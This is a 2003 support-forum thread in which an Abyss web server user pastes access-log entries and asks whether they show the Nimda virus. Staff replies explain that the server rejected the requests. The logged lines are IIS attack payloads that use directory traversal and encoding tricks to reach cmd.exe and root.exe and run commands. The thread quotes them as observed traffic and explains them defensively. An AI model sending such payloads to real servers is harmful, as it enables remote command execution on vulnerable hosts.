| View previous topic :: View next topic |
| Author |
Message |
os17fan
-
Joined: 21 Mar 2003
Posts: 531
Location: USA
|
 Posted: Sun Apr 06, 2003 5:03 am Post subject: is abyss a IIs web server and if it is how do i patch it |
 |
|
my name is Josh and im wondering if abyss is a IIs type web server , i need to know this so i can patch the web server to block the nimda virus
:D :?: :(
_________________
This web server is the best ! |
|
| Back to top |
     |
 |
vbgunz
-
Joined: 02 Feb 2003
Posts: 615
Location: Florida
|
| Posted: Sun Apr 06, 2003 7:30 am Post subject: |
|
|
No it isn't. Its a Windows server but far from being IIS. You shouldn't have to worry much about IIS infections when using Abyss. Good luck :)
_________________
Victor B. Gonzalez
http://aeonserv.com |
|
| Back to top |
   |
|
os17fan
-
Joined: 21 Mar 2003
Posts: 531
Location: USA
|
| Posted: Sun Apr 06, 2003 8:18 am Post subject: |
|
|
are sure because i got some weird coding in my log file the other night , here's a sample below
68.32.22.142 - - [04/Apr/2003:19:42:45 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
68.32.22.142 - - [04/Apr/2003:19:42:50 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
68.32.22.142 - - [04/Apr/2003:19:42:57 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
68.32.22.142 - - [04/Apr/2003:19:43:02 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
68.32.22.142 - - [04/Apr/2003:19:43:06 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
68.32.22.142 - - [04/Apr/2003:19:43:09 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
68.32.22.142 - - [04/Apr/2003:19:43:13 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
68.32.22.142 - - [04/Apr/2003:19:43:18 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
68.32.22.142 - - [04/Apr/2003:19:43:21 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
68.32.22.142 - - [04/Apr/2003:19:43:24 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
68.32.22.142 - - [04/Apr/2003:19:43:28 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
68.32.22.142 - - [04/Apr/2003:19:43:31 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
Someone help , i think this is the Virus nimda trying to download to my computer :(
_________________
This web server is the best ! |
|
| Back to top |
|
|
aprelium
-
Joined: 22 Mar 2002
Posts: 6800
|
| Posted: Sun Apr 06, 2003 3:16 pm Post subject: |
|
|
The log lines you get means that someone tried to attack your server thinking that's an IIS one, but the server refuses these attacks (error codes 400 and 404). So do not worry.
_________________
Support Team
Aprelium - http://www.aprelium.com |
|
| Back to top |
|
|
os17fan
-
Joined: 21 Mar 2003
Posts: 531
Location: USA
|
| Posted: Sun Apr 06, 2003 6:57 pm Post subject: |
|
|
So at the end were it says 400 thats a error
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
So my server is completely nimda virus free !
_________________
This web server is the best ! |
|
| Back to top |
|
|
aprelium
-
Joined: 22 Mar 2002
Posts: 6800
|
| Posted: Mon Apr 07, 2003 11:10 am Post subject: |
|
|
| os17fan wrote: | So at the end were it says 400 thats a error
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
So my server is completely nimda virus free ! |
Error code 400 means that Abyss refuses to process the offeding request.
_________________
Support Team
Aprelium - http://www.aprelium.com |
|
| Back to top |
|
|
|
